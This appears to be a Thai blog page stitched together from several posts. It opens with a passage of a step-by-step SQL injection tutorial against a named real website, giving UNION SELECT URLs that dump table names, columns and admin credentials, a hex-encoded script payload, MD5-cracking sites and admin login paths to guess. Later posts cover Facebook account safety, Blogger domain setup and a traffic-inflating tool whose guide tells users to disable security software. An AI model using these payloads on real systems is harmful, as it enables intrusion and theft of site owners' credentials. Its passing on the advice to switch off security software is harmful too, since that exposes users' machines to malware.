จะได้ 3f3f3f3f203f3f3f203f3f3f3f3f3f3f3f3f3f203f3f203f3f3f3f203c7363726970743e616c65727428273f3f3f3f3f3f3f3f3f3f3f3f3f2729203c2f7363726970743e

ให้เราก็อปไปต่อ ท้าย คำว่า 0x ก็จะได้ 

http://www.mrt.itd.co.th/newsdetail.php?id=-27+union+select+1,0x3f3f3f3f203f3f3f203f3f3f3f3f3f3f3f3f3f203f3f203f3f3f3f203c7363726970743e616c65727428273f3f3f3f3f3f3f3f3f3f3f3f3f2729203c2f7363726970743e,3,4,5,6,7--

ถ้าจะ Hack แบบ หา Username และก็ Password ของ Admin ก็ให้เรา หา Tabel และ Colum ของ Admin ต่อโดยการ

ลบ เลข คอลัมน์ที่มีช่องโหว่ ออก แล้ว ใส่ group_concat(table_name,0x0a) เข้าไปแทน และ หลังเลข คอลัมน์ตัวสุดท้ายให้ Spac 1 ช่อง แล้วใส่ from information_schema.tables where table_schema=database()--
ก็จะได้ดังนี้ http://www.mrt.itd.co.th/newsdetail.php?id=-27+union+select+1,group_concat(table_name,0x0a),3,4,5,6,7 from information_schema.tables where table_schema=database()--

จากนัันหน้าเว็ปไซด์จะโชว์ลิสชื่อ Tables ทั้งหมดที่อยู่ในฐานข้อมูล..
Code:
category ,linktext ,maincategory ,member ,news ,pdfcategory ,pdfitem ,pictureshow ,web_config ,web_stat
หลังจากที่ได้ชื่อ Tables มาหลายตัว. สิ่งที่ต้องทำคือหา Table ที่มีข้อมูลของ User/Admin อยู่ในนั้น. ในตัวอย่างที่ได้มา table ที่ชื่อ member น่าจะมีข้อมูลเหล่านั้นอยู่.

5. หาชื่อคอลัมน์ใน Table และ ยูสเซ่อกับพาสแอดมิน

ดูที่โค้ตด้านล่างนี้ให้ดีๆ
Code:
http://www.mrt.itd.co.th/newsdetail.php?id=-27+union+select+1,group_concat(column_name,0x0a),3,4,5,6,7 from information_schema.columns where table_name=0x6d656d626572--
มาดูกันมีอะไรแตกต่างไปมั้ง:

    Quote:table_name = แทนที่โดย "column_name"
    information_schema.tables = แทนที่โดย "information_schema.columns"
    table_schema = แทนที่โดย "table_name"
    database() = แทนที่โดย "0x6d656d626572--"

สงสัยกันใช่ไหมว่าทำไมตัวท้ายต้องเป็น Hex โค้ต 0x6d656d626572--
อันดับแรกที่ผมใส่ 0x เพื่อที่จะให้มันอ่านโค้ต hex ได้. เค.. ผมจะอธิบายให้ง่ายๆ ชื่อ Table ของเราคือ member เผื่อที่จะเข้าไปในฐานข้อมูล Table ได้เราต้องเปลี่ยนชื่อมันให้เป็น hex โค้ต. ผมใช่เว็ปไซด์นี้ในการเปลี่ยน.
Code:
http://www.swingnote.com/tools/texttohex.php
เราก็จะได้ 6d656d626572 เป็น Hex โค้ตของ member และเพื่อที่จะทำให้เว็ปไซด์อ่านได้เราจะใส่ 0x เข้าไปข้างหน้า.. ดังนั้นโค้ตจะเป็นแบบนี้..
Code:
6d656d626572
......
.............
จากนั้นเราจะได้คอลัมน์ทั้งหมดใน Table ตัวนี้เช่น:

    id ,name ,surname ,gender ,email ,username ,password ,datetime ,status

แน่นอนที่ที่มีข้อมูลที่เราต้องการต้องอยู่ใน username และ password
เครขั้นตอนสุดท้าย... มาเอายูสกับรหัสแอดมินของเว็ปนี้โดยใช้คำสั่ง group_concat
Code:
http://www.mrt.itd.co.th/newsdetail.php?id=-27+union+select+1,group_concat(username,0x3a,password,0x0a),3,4,5,6,7 from member--

แล้วคุณก็จะได้..
Code:
admin:21232f297a57a5a743894a0e4a801fc3
username: admin
password: 21232f297a57a5a743894a0e4a801fc3
ถอดได้ : amin

เครสพิเศษ: Hashed Usernames and Passwords

เว็ปไซด์ส่วนใหญ่จะโชว์พาสเป็น MD5 Hashed. ดังนั้นเราต้องแคร็กมันโดยใช้เว็ปไซด์ด้านล่าง:

    Quote:http://www.md5decrypter.co.uk/
    http://www.md5this.com/
    http://www.md5crack.com/
    http://hashchecker.de/find.html

MD5 Hash จะมี 32 ตัว
SHA-1 Hash จะมี 40 ตัว

ขั้นตอนสุดท้าย: หาหน้าแอดมินเพื่อที่จะล็อกอิน

ตอนนี้เรามียูสกับพาสแอดมินแล้ว. ที่เหลือก็แค่หาหน้าล็อกอินแอดมินก็จะสามารถเข้าไปควบคุมเว็ปไซด์นั้นได้เต็มตัว.

ตัวอย่างหน้าแอดมิน:
Code:
www.xxxx.com/admin
www.xxxx.com/admins
www.xxxx.com/users
www.xxxx.com/admin.php
www.xxxx.com/admin/login.php
www.xxxx.com/login.php
www.xxxx.com/login

วันพฤหัสบดีที่ 4 กุมภาพันธ์ พ.ศ. 2559

วิธีป้องกัน ไม่ให้โดน Hack เฟสบุ๊ค

ในฐานะที่ แอดมิน อยู่ในสังคม Hacker มานาน ก็ขอทำหน้าที่ หมวกขาว ซักวัน เพื่อ ปกป้องความ เป็น ส่วน ตัว ของ Facebook เรานะครับ วันนี้ ผมจะมาแนะนำวิธี การ ป้องกัน ตัว ไม่ให้โดน Hack รหัสผ่าน และ ก็อีเมล์ Facebook ของเรา นะครับ จะทำได้ ยังไง กัน เอาล่ะ ผมอยากให้ ลูกเพจ มาศึกษา ไปพร้อมๆ กันน่ะครับ

ก่อนอื่น ต้องขอบอกก่อนเลย นะครับ ว่า เว็บไซต์ Facebook เป็น Social Network ที่มีระดับความปลอดภัยสูง มาก คือ แทบจะไม่มี ช่องโหว่ ให้ Hacker คนไหน ได้ ฝึก วิชา เลย ล่ะครับ เพราะ เขา ปิดช่องโหว่ กันเกือบจะทุกวัน

ดังนั้น ข่าวลือ เรื่องเจอ ช่องโหว่ Facebook จริงๆ จะมีน้อย มากหรือ แทบ จะไม่มี เลย เพราะ ฉนั้น เรามั่นใจ ใน Security ของ Facebook แน่นอน ว่าไม่มี ช่องโหว่ อะไร ให้เจาะ เข้าไป ขโมย ข้อมูล ได้ โดยตรง แต่ถ้า จะเจาะ ได้ ก็คง มาจาก ตัว User เองครับ ที่ไม่ระมัด ระวังตัวเอง
เทคนิคแรกก็คือ

1 เปลี่ยน รหัสผ่าน Facebook ทุกเดือนครับ แน่นอน วิธีนี้ Work 100%
2 เวลาที่มีคนมาโพสต์ อะไรลง หน้า Wall ของเราแล้ว มีลิงค์ ที่หน้าสงสัย มันคือ phishing นั้นเอง ครับ phishing คืออะไร มันก็คือ หน้าเว็บปลอม ที่ทำ ไว้เลียน แบบ Facebook นั้นเอง ครับ โดยจะมีฟอร์ม ให้เรากรอก E-Mail และก็ รหัส ผ่าน ลงไป แต่ !! เดี๋ยวก่อน เมื่อเรา คลิก เข้าสู่ ระบบ คุณรู้ ไหมครับ ว่ามี อะไร ทำงาน อยู่เบื้อง หลังของ มัน มัน ก็คือ Action : login.php นั้น เอง ครับ ที่ถูก เปลี่ยน เป็น ฟรอม์ ดักรหัส โดยใช้ Method POST โดยอาศัยหลักการ ง่ายๆ นี้ Hacker ก็ได้ รหัสผ่าน Facebook ของท่านไปแล้ว ครับ

สำหรับ วิธี ป้องกันน่ะ ครับ อย่างแรกเลย คือ อย่า !! คลิกลิงค์ อันนั้นครับ ลบออกไปเลย และต่อมาให้ เราดูที่ ช่อง URL เป็น หลัก ถ้า URL ไม่ใช่ ของ Facebook จริงๆ ห้าม !! ใส่ รหัส และคลิก Log In เด็จขาดครับ

แต่ถ้าใครสงสัยว่าจะโดน ฟิชชิ่ง หรือ ว่า โดน ดักรหัสไปแล้ว ล่ะ จะทำยังไง สิ่งที่คุณทำได้ คือ การเปลี่ยน รหัส ผ่านครับ เอาให้คาดเดา ได้ ยากที่สุด เครนะครับ
3 อีก เทคนิค ยอดนิยม ของ Hacker ที่สามารถ สาวมาถึง Account หรือ บัญชี ผู้ใช้ Facebook ของคุณ ได้ ก็คือ การใช้ อีเมล์ และ รหัส ผ่าน ชุดเดียวกัน ครับ หลายคน สงสัย ว่า เอ๊ะ แล้วมันจะเกี่ยวกันยังไง เอ่ย แอดมินจะ อธิ บายง่ายๆ น่ะครับ ถ้าสมมุติ เราไป สมัคร สมาชิก เว็บ ไซต์ เว็บ หนึ่ง แล้วเรา ใช้ รหัสผ่าน และ ก็ E-Mail ที่ใช้ กับ Facebook ด้วย ถ้า เกิด เว็บ นั้น มีช่อง โหว่ SQL Injection ล่ะ แน่นอน เขาจะได้ อีเมล์ และ รหัสผ่าน ของคุณไปด้วย เพราะ ฉนั้น พยายาม ใช้รหัสผ่าน ใน แต่ล่ะ เว็บไซต์ ให้ต่าง กันน่ะครับ

4 การขโมย Access Token คีย์
Access token คืออะไร ได้มาจากไหน? มันก็คือชุดตัวอักษรชุดหนึ่งที่ app หรือ web app สร้างขึ้นมาเพื่อใช้ในการติดต่อกับ Facebook API เจ้า Access Token นี้จะถูกกำหนดมาแล้วว่าให้ดึงข้อมูลอะไรได้บ้างซึ่งเค้าก็จะบอกไว้ก่อนที่คุณจะกดอนุญาตให้ใช้ข้อมูลคุณได้ แต่หลายๆคนก็ไม่ยอมอ่านกดข้ามไปเลย)

เมื่อคุณกดปุ่ม Get Access token มันก็จะลิ้งค์กลับไปยังหน้าเฟซบุ้คของคุณ โดยจะมีแอพต่างๆที่คุณรู้จักเช่น Sony Xperia, Samsung Mobile ขออนุญาตเข้าถึงข้อมูลของคุณ (แอพเหล่านี้น่าจะเป็นแอพที่เหล่าแฮคเกอร์ทำขึ้น ถ้าลองคลิกเข้าไปดูรายละเอียดก็จะพบว่ามันขอเข้าถึงข้อมูลส่วนตัวของคุณเยอะมาก) แต่เป้าหมายสุดท้ายของผู้ไม่หวังดีก็คือต้องการให้นำ Access token ที่ปรากฎอยู่ในช่อง URL เฟซบุ้คของคุณไปใส่ในเว็บ more-liker-facebook.weebly.com ถ้าหากคุณกรอกมันเข้าไปแล้ว ก็เหมือนกับการมอบสิทธิ์ให้แฮคเกอร์สามารถโพสต์รูปหรือข้อความบนเฟซบุ้คของคุณได้โดยไม่ได้รับอนุญาต

วิธีที่ ทำ ให้ Access Token Key เสีย ก็ คือ การลบ แอพ Facebook ที่เรา กด ตกลง ออกครับ แล้ว มันลบ ยังไง ล่ะ ??

ให้เราไปที่นี่ https://www.facebook.com/settings?tab=applications 
น่ะครับ เจอแอพ อะไร ที่หน้าสงสัย หรือ ว่าเรา โพสต์ เองอะไร อย่างงี้ ก็ X ลบออกไปเลยน่ะครับ

อีกวิธี ที่ ทำให้ Access Token คีย์ เสียได้เหมือนกันก็คือ การ เปลี่ยน รหัสผ่าน Facebook น่ะครับ
5 การ ป้องกัน ไวรัส สแปม โทจัน มัลแวร์ ด้วย แอนตี้ ไวรัส อันนี้ จำเป็น และ สำคัญมากน่ะครับ ให้เราหมั่น ตรวจ สอบ คอยสแกนไวรัสทุกวันๆ รวมถึงไม่ดาวน์โหลด อะไร แปลกๆ บน Facebook หรือ จาก เว็บ ภายนอกเอง เด็จขาด

ที่สำคัญ อย่า ปิด Windows Defender ที่เปรียบ เสมือน หมา คอยเฝ้า ไล่กัด พวกไวรัส แปลกปลอม ต่างๆ ที่คอยเข้ามาใหเครื่องของเราด้วยน่ะครับ อันนี้ ก็น่า จะปลอด ภัย 100% ที่สำคัญ คือ อย่ากด Run หรือ คลิก โปรแกรม อะไร แปลกๆ

ที่เราไม่คุ้นเคย ด้วยน่ะครับ เพราะอาจจะเป็น โทจัน ก็ได้
6 หมั่นตรวจสอบดู บันทึกกิจกรรมด้วย น่ะครับ ว่าเราได้ไป กดไลค์ หรือ ไปโพสต์ อะไร ที่เราไม่ได้ เป็นคนดำเนินการเอง หรือไม่ ถ้าใช่ ก็หน้าจะเป็น ที่ตัว Access Token เองน่ะครับ จะโทษ อะไรไม่ได้
สำหรับวิธีแก้ไข ก็ ย้อนกลับไปดูที่ ข้อ 4 น่ะครับ
7 คอยเช็ค เซสซันการ ใช้งาน ตลอดเวลา น่ะครับ ว่ามี บุคคล ภายนอกแอบเข้ามา เล่น Facebook เราหรือไม่ โดยเข้าไปที่ https://www.facebook.com/settings
ถ้าเห็น การ Log In จาก เซสซันหรือ อุปกรณ์ ที่เราไม่ รู้ จัก ก็ สั่ง หยุดกิจกรรม ได้เลยน่ะครับ สำหรับวิธีการ ป้องการ ตนเอง ไม่ให้ Facebook โดน Hack จาก ใคร ง่ายๆ
เราควร จะมา ตั้งค่า เพิ่มเติมเอา ที่นี่ https://www.facebook.com/settings?tab=security 

น่ะครับ จะได้ปลอดภัย มากยิ่งขึ้น เอา ล่ะ ผมเขียน มา ตั้ง นาน แล้ว ขอแค่ คำขอบคุณ จาก ลูก เพจ หน่อยน่ะครับ จะได้ มีกำลังใจเขียนให้อ่าน อีก ^^




วิธีตั้งค่า ( Domain ) โดเมน เพื่อใช้งานกับ Blogger หรือ Blogspot

วิธีตั้งค่า ( Domain name ) โดเมน
เพื่อใช้งานกับ Blogger หรือ Blogspot



1. จัดการติดตั้ง  โดเมนเนม สำหรับใช้งานที่ Blogger


Login เข้าสู่ระบบจัดการ Blogger
1.1 คลิก การตั้งค่า > พื้นฐาน




1.2 คลิก เปลี่ยนเป็นการตั้งค่าขั้นสูง




1.3 คลิก ระบุชื่อโดเมนเนม เปลี่ยน thaiego เป็นชื่อโดเมนของท่าน (ระบุ www) และกด บันทึก
1.4 นำค่า Domain Record ในกรอบสีแดง ตั้งค่าในระบบจัดการโดเมนเนม ในข้อ 2 หรือ แจ้งกับเจ้าหน้าที่



2. จัดการตั้งค่า DNS ให้กับ Domain name


2.1 Login เข้าสู่ระบบจัดการ โดเมนเนม
https://domain.ireallyhost.com 

วิธีการเข้าจัดการ โดเมนเนม
https://www.ireallyhost.com/kb/domain/285

หมายเหตุ
ยกเว้น .TH อาทิ .co.th .in.th .or.th .go.th .net.th
ให้นำค่าในกรอบสีแดง แจ้งกับเจ้าหน้าที่ไอเรียลลี่โฮสดำเนินการติดตั้งให้

2.2 เลือกโดเมมที่ต้องการ และ คลิก Manage DNS


2.3 ตั้งค่า CNAME โดย คลิก CNAME Records > คลิก Add CNAME Record


นำค่า CNAME ในข้อ 1.4 ใช้ตั้งค่า ดังนี้





ผลที่ได้



2.4 ตั้งค่า DNS ให้กับโดเมนเนม โดยรีเฟรชเบราว์เซอร์ ระบบจัดการโดเมนเนม
คลิก Configure Now > Fix Name Servers Automatically



เมื่อทำการตั้งค่าสมบูรณ์ โปรดรอ DNS Update ราว 1-72 ชม.
และทำการ Verify การตั้งค่า โดเมนเนม ดังข้อ 1 อีกครั้ง
และเมื่อทำการติดตั้งโดเมน กับ Blogger เสร็จให้ดำเนินการในขั้นตอนที่ 3 ต่อไป


DNS Update หมายถึง ระยะเวลาที่อินเตอร์เน็ตของผู้เยี่ยมชมเว็บไซต์ หรือ ISP มองเห็นการเปลี่ยนแปลงเส้นทางโดเมนเนม โดยมีระยะเวลาไม่เท่ากัน อาจใช้ระยะเวลา 1-48 ชม. หรือ 1-72 ชม. โดยประมาณ



3. การตั้งค่าโดเมน ใช้กับ Blogger ให้ใช้แบบมี www หรือ ไม่มี www ก็ได้
หรือ none www redirect to www
เช่น https://siamego.com -> https://www.siamego.com โดยอัตโนมัติ



3.1 ภายหลังจากตั้งค่าโดเมน ให้กับ Blogger (ในข้อ 1) เรียบร้อยแล้ว
คลิก แก้ไข
> ติ๊ก เปลี่ยนเส้นทาง domain.com ไปที่ www.domain.com
> กดบันทึก


ก็จะพบว่า สามารถใช้งานโดเมนเนม กับ Blogger ได้อย่างสมบูรณ์ ทั้งแบบมี www และ ไม่มี www




แจกโปรแกรมเพิ่ม UIP JingJing

ดาวน์โหลดซอฟต์แวร์ JingJing Spiritsoft




  • รุ่นล่าสุด: 4.0.3
  • ขนาดไฟล์: 260 กิโลไบต์
  • สิ่งแวดล้อมปฏิบัติการ: Win XP, 2003, Vista, Win7, Win8



ดาวน์โหลดซอฟต์แวร์ JingJing Spiritsoft
1 ดาวน์โหลดซอฟต์แวร์ JingJing Spiritsoft
ให้คลิกปุ่มดาวน์โหลดตอนนี้เพื่อดาวน์โหลดซอฟต์แวร์ลงในคอมพิวเตอร์ของคุณที่แสดง:
หมายเหตุ: หากซอฟต์แวร์รักษาความปลอดภัยซอฟต์แวร์ดาวน์โหลดหลังจากที่ผิดพลาดลบปิดซอฟต์แวร์รักษาความปลอดภัย
ในการดาวน์โหลดหรือเพิ่มตัวช่วยสร้างซอฟต์แวร์รักษาความปลอดภัยที่จะไว้วางใจรายการ
2 ซอฟต์แวร์การบีบอัด ( รหัสผ่าน: 123456 )
หลังจากดาวน์โหลดซอฟต์แวร์เสร็จสมบูรณ์แล้ว unzip ไฟล์โดยใช้ตัวช่วยสร้าง WinRAR ไฟล์ซอฟต์แวร์ jingling.rar 
ได้รับ jingling.exe ดังแสดง:
3 เพิ่ม URL
หลังจากที่ซอฟต์แวร์กำลังทำงานให้คลิกที่ "เพิ่ม URL ของคุณ" แล้วกดปุ่มป้อน URL ที่คุณต้องการจะมีส่วนร่วมเข้าชม
และคลิก "OK" ดังที่แสดง:



คุณต้องการมากกว่าเพียงแค่ URL ง่ายๆที่คุณสามารถแบ่งปันกระแสเพื่อเรียนรู้ซอฟต์แวร์มีดูรายละเอียดที่แต่ละฟังก์ชั่นการใช้ซอฟแวร์
ที่จะช่วยให้
อินเตอร์เฟซการทำงานของซอฟท์แวร์
ฟังก์ชั่นอิน​​เตอร์เฟซหลักที่:



1, ซอฟต์แวร์การจัดหมวดหมู่การทำงาน: "ยูนิเวอร์แซไหล" และการจราจรช่วยสร้างรุ่นก่อนหน้านี้มีหน้าที่เหมือนกัน
ตามวิธีการก่อนหน้าใช้เพื่อให้บรรลุผลของ
2 จำนวนของ URL และการตั้งค่าซอฟท์แว: แสดง URL ปัจจุบันและเพิ่มจำนวนของ URL ที่สามารถเพิ่มเป็นปุ่มการตั้งค่าซอฟแวร์
3 รายการ URL: การแสดงผลและจัดการเว็บไซต์ได้รับการเพิ่มคุณสามารถดูที่การไหลของข้อมูลที่แก้ไข URL ที่เป็นอัตราการเข้าชม
การดำเนินงานมากขึ้นการตั้งค่าการเพิ่มประสิทธิภาพ
4 เพิ่ม URL: เพื่อเพิ่ม เว็บไซต์ "ออนไลน์ตลอด" เว็บไซต์ "การไหลที่ถูกต้อง" URL "เป็นที่นิยม" เว็บไซต์และการใช้งานที่เกี่ยวข้องปุ่มวิธีใช้
5 หน้าต่างข้อมูล: เวปไซด์ที่สำคัญสำหรับการแสดงข้อมูลที่เกี่ยวข้องกับความช่วยเหลืออย่างเป็นทางการและซอฟต์แวร์
ตัวช่วยสร้างการจราจรเครื่องมือทดสอบที่รายละเอียดของ
การจราจรเครื่องมือทดสอบตัวช่วยสร้างที่ใช้เป็นหลักในการตรวจสอบไม่ว่าจะเป็นป๊อปอัปที่สามารถระเบิดการตรวจสอบการเข้าถึงเพจย่อย 
URL เป้าหมายที่จะหาการตรวจสอบตามที่แสดง:



1 แถบที่อยู่: กรอกข้อมูลในแถบที่อยู่และเบราว์เซอร์ในการทดสอบที่อยู่เว็บเดียวกันมักจะ "เว็บไซต์ของฉัน";
2 ปุ่มการเข้าถึง: กรอกหลังจากที่คลิกเข้าสู่เว็บเบราเซอร์เช่นปุ่มเพื่อเปิดหน้าตามปกติ;
3, การเข้าถึงอัตโนมัติทดสอบภายใต้ "การเข้าถึงโดยอัตโนมัติเพื่อ" ผลของการเยี่ยมชมเพจย่อยสิ่งที่เป็น "การเข้าถึงอัตโนมัติ" 
โปรดดูที่การจราจรทั่วไป - การตั้งค่าการเพิ่มประสิทธิภาพ ;
4 เยี่ยมชมการจับคู่: ย่อยผลการทดสอบการเข้าภายใต้ "ตรงกับการเข้าถึง" กรณีสิ่งที่เป็น "การเข้าถึงตรงกับ" โปรดดูที่การจราจรทั่วไป 
- การตั้งค่าการเพิ่มประสิทธิภาพ ;
5 รีเฟรช "เว็บไซต์ของฉัน": การทดสอบภายใต้ "Refresh 'เว็บไซต์ของฉัน'" ผลสถานการณ์การฟื้นฟูสิ่งที่เป็น "Refresh 'เว็บไซต์ของฉัน'" 
โปรดดูที่การจราจรทั่วไป - การตั้งค่าการเพิ่มประสิทธิภาพ ;
6 คลิกย่อยทดสอบการเข้าถึง: ทั้งนี้ขึ้นอยู่กับผลกระทบที่เลือกการเข้าถึงการทดสอบโหมดการเข้าถึงเพจย่อยและดูเพื่อดู
หน้าในแผนภาพการเชื่อมโยงเพจย่อยภูมิภาค
7 ประเภทเป้าหมาย: เลือก URL ปลายทางที่จะหาทางจับคู่ผ่านทางที่อยู่เชื่อมโยงหรือชื่อการเชื่อมโยงในสองวิธี
8 ลักษณะเป้าหมาย: การทดสอบการเข้าถึง URL ปลายทางคุณสามารถป้อน URL ปลายทางของคุณเองยังสามารถคลิกที่รายการที่
เกี่ยวข้องของรายการที่จะเลือก URL ปลายทางหรือปลายทางของชื่อ;
9 คลิกดูแผนภาพการจับคู่ URL ปลายทาง: URL ปลายทางการเข้าถึงการทดสอบและการดูหน้าจะหาลิงค์ URL เป้าหมายในแผนที่ภูมิภาค
10 รายการ URL เป้าหมาย: คลิกขวาที่ปุ่มเมาส์ขวาบนหน้าเว็บที่คุณต้องการในการเข้าถึง URL ปลายทางลิงค์ข้อความ / ภาพจะปรากฏ
เป็นลักษณะของ URL ที่เราแนะนำให้ใช้ URL ปลายทางที่แนะนำ;